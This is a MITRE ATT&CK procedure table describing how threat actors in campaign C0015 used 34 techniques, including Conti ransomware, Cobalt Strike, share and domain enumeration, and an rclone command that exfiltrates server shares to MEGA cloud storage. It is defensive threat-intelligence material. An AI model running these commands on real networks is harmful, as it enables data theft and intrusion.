Real-world descriptions of how a group, tool or campaign used a technique.
34 examples
| Technique | Used by | Procedure example |
|---|---|---|
| T1005 Data from Local System |
CampaignC0015 | During C0015, the threat actors obtained files and data from the compromised network. |
| T1016 System Network Configuration Discovery |
CampaignC0015 | During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host. |
| T1018 Remote System Discovery |
CampaignC0015 | During C0015, the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration. |
| T1021.001 Remote Desktop Protocol |
CampaignC0015 | During C0015, the threat actors used RDP to access specific network hosts of interest. |
| T1027 Obfuscated Files or Information |
CampaignC0015 | During C0015, the threat actors used Base64-encoded strings. |
| T1030 Data Transfer Size Limits |
CampaignC0015 | During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration. |
| T1036 Masquerading |
CampaignC0015 | During C0015, the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file. |
| T1039 Data from Network Shared Drive |
CampaignC0015 | During C0015, the threat actors collected files from network shared drives prior to network encryption. |
| T1047 Windows Management Instrumentation |
CampaignC0015 | During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host. |
| T1055.001 Dynamic-link Library Injection |
CampaignC0015 | During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process. |
| T1057 Process Discovery |
CampaignC0015 | During C0015, the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes. |
| T1059.003 Windows Command Shell |
CampaignC0015 | During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries. |
| T1059.005 Visual Basic |
CampaignC0015 | During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code. |
| T1059.007 JavaScript |
CampaignC0015 | During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code. |
| T1069.001 Local Groups |
CampaignC0015 | During C0015, the threat actors used the command `net localgroup "adminstrator" ` to identify accounts with local administrator rights. |
| T1069.002 Domain Groups |
CampaignC0015 | During C0015, the threat actors use the command `net group "domain admins" /dom` to enumerate domain groups. |
| T1074.001 Local Data Staging |
CampaignC0015 | During C0015, PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`. |
| T1083 File and Directory Discovery |
CampaignC0015 | During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful. |
| T1105 Ingress Tool Transfer |
CampaignC0015 | During C0015, the threat actors downloaded additional tools and files onto a compromised network. |
| T1124 System Time Discovery |
CampaignC0015 | During C0015, the threat actors used the command `net view /all time` to gather the local time of a compromised network. |
| T1135 Network Share Discovery |
CampaignC0015 | During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares. |
| T1204.002 Malicious File |
CampaignC0015 | During C0015, the threat actors relied on users to enable macros within a malicious Microsoft Word document. |
| T1218.005 Mshta |
CampaignC0015 | During C0015, the threat actors used `mshta` to execute DLLs. |
| T1218.010 Regsvr32 |
CampaignC0015 | During C0015, the threat actors employed code that used `regsvr32` for execution. |
| T1218.011 Rundll32 |
CampaignC0015 | During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process. |
| T1219.002 Remote Desktop Software |
CampaignC0015 | During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network. |
| T1482 Domain Trust Discovery |
CampaignC0015 | During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts. |
| T1486 Data Encrypted for Impact |
CampaignC0015 | During C0015, the threat actors used Conti ransomware to encrypt a compromised network. |
| T1553.002 Code Signing |
CampaignC0015 | For C0015, the threat actors used DLL files that had invalid certificates. |
| T1566.001 Spearphishing Attachment |
CampaignC0015 | For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims. |
| T1567.002 Exfiltration to Cloud Storage |
CampaignC0015 | During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`. |
| T1570 Lateral Tool Transfer |
CampaignC0015 | During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network. |
| T1588.001 Malware |
CampaignC0015 | For C0015, the threat actors used Cobalt Strike and Conti ransomware. |
| T1588.002 Tool |
CampaignC0015 | For C0015, the threat actors obtained a variety of tools, including AdFind, AnyDesk, and Process Hacker. |
Data from MITRE ATT&CK® (Enterprise). ATT&CK® is a registered trademark of The MITRE Corporation.